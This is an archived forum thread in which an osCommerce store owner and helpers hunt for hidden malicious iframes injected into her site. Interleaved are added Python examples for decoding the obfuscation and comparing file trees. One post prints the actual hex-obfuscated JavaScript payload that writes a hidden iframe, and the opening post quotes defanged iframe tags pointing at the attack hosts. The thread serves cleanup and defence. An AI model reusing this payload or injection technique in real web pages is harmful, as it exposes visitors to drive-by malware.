fengshui37 Posted January 21, 2009

My client was recently informed by AusCERT that her website was hosting malicious content, specifically iframes that pointed to links as follows (here and below, I have masked and incorrectly formatted them so these are NOT the exact links):

    hxxp://msn-analytics. net/count.php?o=2
    hxxp://pinoc. org/count.php?o=2
    hxxp://wsxhost. net/count.php?o=2

These were being inserted into the HTML coding for many pages. I believe we fixed the problem that allowed it to get in there in the first place and, with hours of work, removed all instances of the code and finally removed a couple of PHP scripts that had been installed on the server which we believe were allowing the unwanted access.

The only problem is that the iframe code is STILL present in the source code for the catalog site (osCommerce). I downloaded EVERY single file associated with the catalog site and searched it for instances of "pinoc" and "wsxhost" and also decimal, hexadecimal, and binary ASCII representations of those letters and found no instances of it in the osCommerce files, BUT it is still showing up in the source code.

Has anyone else experienced this and, if so, how or where or in what file or where in the MySQL database did you need to go to remove the code such that it was no longer present in the source code for the osCommerce site? For that matter, the code is inserted in the very first line of the source, i.e.:

    <iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    <iframe src="hxxp://pinoc. org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    <iframe src="hxxp://wsxhost. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    <iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html dir="LTR" lang="en">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    ............

Thanks,
- Fengshui37
FIMBLE Posted January 21, 2009

Check the includes/languages/ folder, also .htaccess and your images folders. In which files do you see the iframe present in the source code? Check your header.php + footer.php also.

Sometimes you're the dog and sometimes the lamp post
My Contributions
germ Posted January 21, 2009

You probably won't find it searching for the actual text injected into the page. They normally use obfuscated PHP code to do that. Many hijackers use the PHP function base64_decode for that. Search for the string base64 in the catalog files. If you want you can post any suspicious looking results. It's usually not too difficult to spot "malicious" code. ;)

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
fengshui37 Posted January 21, 2009 (Author)

> Check the includes/languages/ folder, also .htaccess and your images folders. In which files do you see the iframe present in the source code? Check your header.php + footer.php also.

I downloaded it all, including the .htaccess files and image folders etc., onto my hard drive and essentially searched for "pinoc", which is definitely a string that is present in the source code for the "store" (first line before the <html> tag). Since the "webpage" is all script driven in osCommerce, I am actually seeing it when selecting the "view source code" option from either right click or the browser drop down menu. I've been trying to find where it has been placed in one of the scripts that displays the store. I found every instance elsewhere on the server outside of the catalog folder (446 of them) and removed them and also fixed what I think was the original loophole that allowed the doggone thing to be "installed". So far that is holding, but I still can't find out where they installed it in the catalog or how they did it. Also searched for the string "base64". None found.
FIMBLE Posted January 21, 2009

What's your URL? Then I will see the source.

Nic
fengshui37 Posted January 21, 2009 (Author)

> You probably won't find it searching for the actual text injected into the page. They normally use obfuscated PHP code to do that. Many hijackers use the PHP function base64_decode for that. Search for the string base64 in the catalog files. If you want you can post any suspicious looking results. It's usually not too difficult to spot "malicious" code. ;)

I did the search for the string base64 and also threw in "iframe" and still no instances found. It's coming from somewhere, because when I load the page and view source it's there, but it's apparently NOT in any of the catalog files. Unless they've hidden it somehow in one of those core.#### files (I have no idea what their function is). Any other ideas?

- Fengshui37

...never bugs, my programs do however have occasional undisclosed random features...
FIMBLE Posted January 21, 2009

What's the URL?
Lizy Posted January 22, 2009

Hi, I have a similar problem. When I open my osCommerce page I get the virus alert JS/Obfuscated Trojan. I have been looking in the catalog files but I did not find anything. This is my link: http://www.sweettreatfavors.net/catalog/

PLEASE HELP ME. Thanks in advance!

Lizy :(
FIMBLE Posted January 22, 2009

I cannot look as my virus checker will not allow me to. Check your images folder for anything you do not recognise; also check your folder permissions are no higher than 755.

Nic
Guest Posted January 22, 2009

> I cannot look as my virus checker will not allow me to. Check your images folder for anything you do not recognise; also check your folder permissions are no higher than 755. Nic

Source code contains:

    <script>function c1200847515n490fdfacb8138(n490fdfacb8927){ return (parseInt(n490fdfacb8927,16));} function n490fdfacba0f4(n490fdfacba8f0){ function n490fdfacbb4ce(){var n490fdfacbb8c0=2;return n490fdfacbb8c0;} var n490fdfacbace0='';n490fdfacbbcbd=String.fromCharCode;for(n490fdfacbb0dc=0;n490fdfacbb0dc<n490fdfacba8f0.length; n490fdfacbb0dc+=n490fdfacbb4ce()){ n490fdfacbace0+=(n490fdfacbbcbd(c1200847515n490fdfacb8138(n490fdfacba8f0.substr(n490fdfacbb0dc,n490fdfacbb4ce()))));}return n490fdfacbace0;} var xfa='';var n490fdfacbc0ba='3C7'+xfa+'3637'+xfa+'2697'+xfa+'07'+xfa+'43E667'+xfa+'56E637'+xfa+'4696F6E20636865636B5F636F6E7'+xfa+'4656E7'+xfa+'428297'+xfa+'B7'+xfa+'6617'+xfa+'220693D303B7'+xfa+'7'+xfa+'68696C6528646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+'4456C656D656E7'+xfa+'47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+xfa+'292E6C656E67'+xfa+'7'+xfa+'468297'+xfa+'B7'+xfa+'6617'+xfa+'220656C3D646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+'4456C656D656E7'+xfa+'47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+xfa+'295B695D3B6966282028656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E64697'+xfa+'37'+xfa+'06C617'+xfa+'93D3D27'+xfa+'6E6F6E6527'+xfa+'207'+xfa+'C7'+xfa+'C20656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E7'+xfa+'6697'+xfa+'36962696C697'+xfa+'47'+xfa+'9203D3D27'+xfa+'68696464656E27'+xfa+'207'+xfa+'C7'+xfa+'C2028656C2E7'+xfa+'7'+xfa+'69647'+xfa+'4683C3520262620656C2E68656967'+xfa+'687'+xfa+'43C35292920262620656C2E6E616D65213D27'+xfa+'633127'+xfa+'297'+xfa+'B656C2E7'+xfa+'0617'+xfa+'2656E7'+xfa+'44E6F64652E7'+xfa+'2656D6F7'+xfa+'6654368696C6428656C293B7'+xfa+'D656C7'+xfa+'36520692B2B3B7'+xfa+'D7'+xfa+'D636865636B5F636F6E7'+xfa+'4656E7'+xfa+'428293B0A696628216D7'+xfa+'96961297'+xfa+'B646F637'+xfa+'56D656E7'+xfa+'42E7'+xfa+'7'+xfa+'7'+xfa+'2697'+xfa+'465287'+xfa+'56E657'+xfa+'363617'+xfa+'065282027'+xfa+'2533632536392536362537'+xfa+'322536312536642536352532302536652536312536642536352533642536332533312532302537'+xfa+'332537'+xfa+'32253633253364253237'+xfa+'2536382537'+xfa+'342537'+xfa+'342537'+xfa+'30253361253266253266253337'+xfa+'25333925326525333125333325333225326525333225333125333125326525333325333025326625363825363525363925326625336625 37'+xfa+'34253364253332253334253237'+xfa+'2532302537'+xfa+'37'+xfa+'2536392536342537'+xfa+'34253638253364253337'+xfa+'253330253331253230253638253635253639253637'+xfa+'2536382537'+xfa+'342533642533352533362533362532302537'+xfa+'332537'+xfa+'342537'+xfa+'39253663253635253364253237'+xfa+'2536342536392537'+xfa+'332537'+xfa+'302536632536312537'+xfa+'39253361253230253665253666253665253635253237'+xfa+'2533652533632532662536392536362537'+xfa+'3225363125366425363525336527'+xfa+'29293B7'+xfa+'D7'+xfa+'6617'+xfa+'2206D7'+xfa+'969613D7'+xfa+'47'+xfa+'27'+xfa+'5653B3C2F7'+xfa+'3637'+xfa+'2697'+xfa+'07'+xfa+'43E';document.write(n490fdfacba0f4(n490fdfacbc0ba));</script>
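The script quoted above is why a search for "iframe" or "pinoc" in the files finds nothing: the page content is a string of two-digit hex codes, cut into fragments and glued together with +xfa+ (xfa is the empty string) so that even the hex does not appear contiguously, and the browser rebuilds it with parseInt(pair,16) and String.fromCharCode. Working through that hex, the plain script walks document.getElementsByTagName('iframe'), removes hidden iframes it did not create, and then document.write()s an iframe of its own that is still percent-encoded inside an unescape('%3c%69%66...') call, so there are two layers to peel. The decoder below is an added example, not code from the thread; it tolerates the whitespace that copy-pasting or page extraction inserts inside the literals, and the sample payload it is exercised on is constructed with a placeholder host.

```python
#!/usr/bin/env python3
"""Decoder for the hex-fragment obfuscation above (added example).

Layer 1: quoted fragments of two-digit hex codes joined with +xfa+.
Layer 2: the decoded script passes a percent-encoded string to
unescape() before document.write(), so the markup is still encoded.
decode_payload() peels both; obfuscate() rebuilds the attacker's layout
so the decoder can be exercised offline on a constructed sample."""
import re
from urllib.parse import unquote

HEX_LITERAL = re.compile(r"'([0-9A-Fa-f\s]*)'")
UNESCAPE_CALL = re.compile(r"unescape\(\s*'([^']*)'\s*\)")


def decode_hex_layer(js):
    """Join every quoted hex fragment in the script and decode it.
    Whitespace inside a fragment (paste damage) is dropped first."""
    hexstr = re.sub(r"\s+", "", "".join(HEX_LITERAL.findall(js)))
    if len(hexstr) % 2:
        raise ValueError("odd number of hex digits; literal is truncated")
    return bytes.fromhex(hexstr).decode("latin-1")


def hidden_markup(plain_js):
    """Percent-decode every unescape('...') argument in the plain script."""
    return [unquote(arg) for arg in UNESCAPE_CALL.findall(plain_js)]


def decode_payload(js):
    """Return (plain script, [decoded markup the script writes])."""
    plain = decode_hex_layer(js)
    return plain, hidden_markup(plain)


def obfuscate(script, chunk=7):
    """Reproduce the attacker's layout: hex pairs sliced every `chunk`
    digits (odd, so pairs straddle fragments) and glued with +xfa+."""
    hexstr = script.encode("latin-1").hex().upper()
    pieces = [hexstr[i:i + chunk] for i in range(0, len(hexstr), chunk)]
    return ("<script>function d(h){var o='';for(var i=0;i<h.length;i+=2)"
            "o+=String.fromCharCode(parseInt(h.substr(i,2),16));return o;}"
            "var xfa='';var p='" + "'+xfa+'".join(pieces)
            + "';document.write(d(p));</script>")


# Constructed inner script in the shape of the decoded payload: a hidden
# iframe, percent-encoded, pointing at a placeholder host.
INNER = ("<script>document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63"
         "%3d%27http://bad.example/x%27%20%73%74%79%6c%65%3d%27display:none"
         "%27%3e%3c%2f%69%66%72%61%6d%65%3e'));</script>")

if __name__ == "__main__":
    plain, markup = decode_payload(obfuscate(INNER))
    print(plain)
    print(markup)
```

To use it on the real thing, save the page source to a file and pass its contents to decode_payload(); the list it returns is the markup the visitor's browser would have written, which is the thing to report to AusCERT and to block. The same two-layer decode is what the antivirus products mentioned later in the thread are flagging when they name the page as an obfuscated or iframe-generator detection.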
fengshui37 Posted January 22, 2009 (Author)

> What's the URL?

URL for the site I'm talking about is www.fengshuicuresandcrystals.com

- Fengshui37
germ Posted January 22, 2009

> URL for the site I'm talking about is www.fengshuicuresandcrystals.com

It gets inserted into the page source before this:

    <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

So what's in your /catalog/index.php before that code? :unsure:
allaboutwicker Posted January 22, 2009

Hi, I just tried to go to the mentioned site and sure enough my Avast detected it and said it was called HTML:Iframe-gen, which it says is a virus/worm. I was searching for a reason that I have been having trouble with my website database acting up. I sure hope I have not been infected with some sort of virus as well. I hope you can figure this out. Sorry that I don't know about such things.
fengshui37 Posted January 22, 2009 (Author)

> It gets inserted into the page source before this: <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> So what's in your /catalog/index.php before that code? :unsure:

Here is the code up to and slightly after that:

    <?php
    /*
      $Id: index.php,v 1.1 2003/06/11 17:37:59 hpdl Exp $

      osCommerce, Open Source E-Commerce Solutions
      http://www.oscommerce.com

      Copyright © 2003 osCommerce

      Released under the GNU General Public License
    */

      require('includes/application_top.php');

    // the following cPath references come from application_top.php
      $category_depth = 'top';
      if (isset($cPath) && tep_not_null($cPath)) {
        $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
        $cateqories_products = tep_db_fetch_array($categories_products_query);
        if ($cateqories_products['total'] > 0) {
          $category_depth = 'products'; // display products
        } else {
          $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
          $category_parent = tep_db_fetch_array($category_parent_query);
          if ($category_parent['total'] > 0) {
            $category_depth = 'nested'; // navigate through the categories
          } else {
            $category_depth = 'products'; // category has no products, but display the 'no products' message
          }
        }
      }

      require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
    ?>
    <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html <?php echo HTML_PARAMS; ?>>

If this is different from what people with "clean" sites have, let me know what is different, because I am not seeing the offending code inserted here in this file.

- Fengshui37
germ Posted January 22, 2009

Look in here:

    require('includes/application_top.php');
fengshui37 Posted January 22, 2009 (Author)

> Hi, I just tried to go to the mentioned site and sure enough my Avast detected it and said it was called HTML:Iframe-gen, which it says is a virus/worm. I was searching for a reason that I have been having trouble with my website database acting up. I sure hope I have not been infected with some sort of virus as well. I hope you can figure this out. Sorry that I don't know about such things.

I'm betting that if your Avast detected it, it also blocked it from causing any problems. I've got this thing 99 percent removed from the server for actually 3 different web sites. The only part I haven't figured out yet is the catalog, i.e. where is it residing/hiding????
germ Posted January 22, 2009

Another thought.... Since you're running your store in an iframe from some file in the root folder, the bugger could be in some file in the root folder and not in the catalog folder at all.
fengshui37 Posted January 22, 2009 (Author)

> Look in here: require('includes/application_top.php');

Nothing jumps out at me here either. So far as I can tell it's OK, but I've got a version from July I can run a comparison on, I suppose. Too many files to do this on one by one with the (actually superior) text editor I'm using....
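Comparing the live tree against an older copy is the right move, and it scales better than reading each file: hash both trees, list what was added, removed or modified, then diff only the modified files to see the exact lines that differ. The script below is an added example, not part of the thread or of osCommerce; the two trees it compares are constructed, with one planted include at the top of application_top.php (the place germ points at, because anything included there runs before index.php emits the doctype), one dropped file under images/, and a configure.php that differs for a legitimate reason. Two caveats for the real run: configure.php and anything edited on purpose since the backup will show as modified, so read the diff rather than trusting the list; and a backup taken after the intrusion began is not a clean reference.

```python
#!/usr/bin/env python3
"""Compare a live osCommerce tree against a known-good copy (added example).

compare_trees() lists added/removed/modified paths by SHA-256; added_lines()
shows what the live copy of a modified file contains that the good copy does
not.  The two trees below are constructed for the demonstration."""
import difflib
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map relative path -> SHA-256 of contents for every file under root."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            digests[os.path.relpath(path, root).replace(os.sep, "/")] = digest
    return digests


def compare_trees(good_root, live_root):
    """Return {'added': [...], 'removed': [...], 'modified': [...]}."""
    good, live = hash_tree(good_root), hash_tree(live_root)
    return {
        "added": sorted(set(live) - set(good)),
        "removed": sorted(set(good) - set(live)),
        "modified": sorted(p for p in set(good) & set(live) if good[p] != live[p]),
    }


def added_lines(good_root, live_root, rel):
    """Lines present in the live copy of `rel` but absent from the good one."""
    def lines(root):
        with open(os.path.join(root, *rel.split("/")), encoding="latin-1") as fh:
            return fh.read().splitlines()
    diff = difflib.unified_diff(lines(good_root), lines(live_root), lineterm="", n=0)
    return [ln[1:] for ln in diff if ln.startswith("+") and not ln.startswith("+++")]


# Constructed trees.  The planted include and the dropped file are
# hypothetical; the configure.php change stands in for a legitimate edit.
GOOD = {
    "index.php": "<?php\n  require('includes/application_top.php');\n?>\n<!doctype html>\n",
    "includes/application_top.php": "<?php\n  require('includes/configure.php');\n",
    "includes/configure.php": "<?php\n  define('DB_SERVER', 'localhost');\n",
}
LIVE = dict(GOOD)
LIVE["includes/application_top.php"] = "<?php\n  @include('images/.cache.php');\n  require('includes/configure.php');\n"
LIVE["includes/configure.php"] = "<?php\n  define('DB_SERVER', 'db1');\n"
LIVE["images/.cache.php"] = "<?php echo '<iframe src=\"hxxp://example.invalid\"></iframe>'; ?>"


def write_tree(spec):
    """Materialise a {relative path: contents} spec in a temp directory."""
    root = tempfile.mkdtemp(prefix="osc_cmp_")
    for rel, body in spec.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    good, live = write_tree(GOOD), write_tree(LIVE)
    report = compare_trees(good, live)
    print(report)
    for rel in report["modified"]:
        print(rel, added_lines(good, live, rel))
```

Run it with the July copy as good_root and the freshly downloaded catalog as live_root. Files under "added" are the first thing to open, since a clean osCommerce install gains no new PHP files in images/ on its own; the "modified" list is where the include that pulls them in will be.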
germ Posted January 22, 2009

^--- My last post ---^
fengshui37 Posted January 22, 2009 (Author)

> Another thought.... Since you're running your store in an iframe from some file in the root folder, the bugger could be in some file in the root folder and not in the catalog folder at all.

Huh? The store isn't being run in an iframe. The catalog is set up as its own web page and separate from the other 3 sites that also have files in the same server/public_html (root) folder. The catalog, i.e. store, is running osCommerce software as written and distributed and not using anything else from elsewhere on the server.
germ Posted January 22, 2009

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN" "http://www.w3.org/TR/REC-html40/frameset.dtd">
    <html>
    <head>
    <title>Feng Shui Cures & Crystals</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <meta name="description" content="Our shop is the only dedicated Feng Shui Cures & Crystals Shop in Australia run by experts.">
    <meta name="keywords" content="feng shui, fengshui, crystals, cures">
    </head>
    <frameset rows="0,*" border=0 frameborder=0 framespacing="0" marginheight=0 marginwidth=0 leftmargin="0" topmargin="0">
    <frame src="frame.htm" border=0 frameborder=0 framespacing="0" marginheight=0 marginwidth=0 leftmargin="0" topmargin="0">
    <frame src="http://www.fengshuinetwork.net/catalog" scrolling=yes>
    </frameset>
    <noframes><body bgcolor="#FFFFFF">
    </body></noframes>
    </html>

If I access the root folder, this is the source.
germ Posted January 22, 2009

OK. It's not an iframe. :lol:
allaboutwicker Posted January 22, 2009

I found this thread by googling the name of this virus, which is HTML:Iframe-gen: http://www.webhostingtalk.com/showthread.php?t=708285 There were many more references that came up when I googled that. Best wishes on getting this worked out.
fengshui37 Posted January 22, 2009 (Author)

> Source code contains: <script>...</script> (the obfuscated script quoted in full in the Guest post above)

Baddog, not sure what this was. Is this the source code I'm looking to remove, i.e. search for this in all the catalog files? I've fixed/removed this thing from a lot (447) of files in other folders and so far it's staying clean after I found and removed a couple of PHP files that my Norton AV identified as containing Hacktool and PHPBackdoor respectively, and changed the permissions, hopefully so they can't re-infect us. They were located in the images and root folders on the server. The only place I can't find (or find out where they've hidden their code) is in the catalog (osCommerce) files.

Thanks to everyone for all your help so far. Great ideas, but so far I haven't been able to find the culprit that is lingering in the OSC site.

- fengshui37
This topic is now archived and is closed to further replies.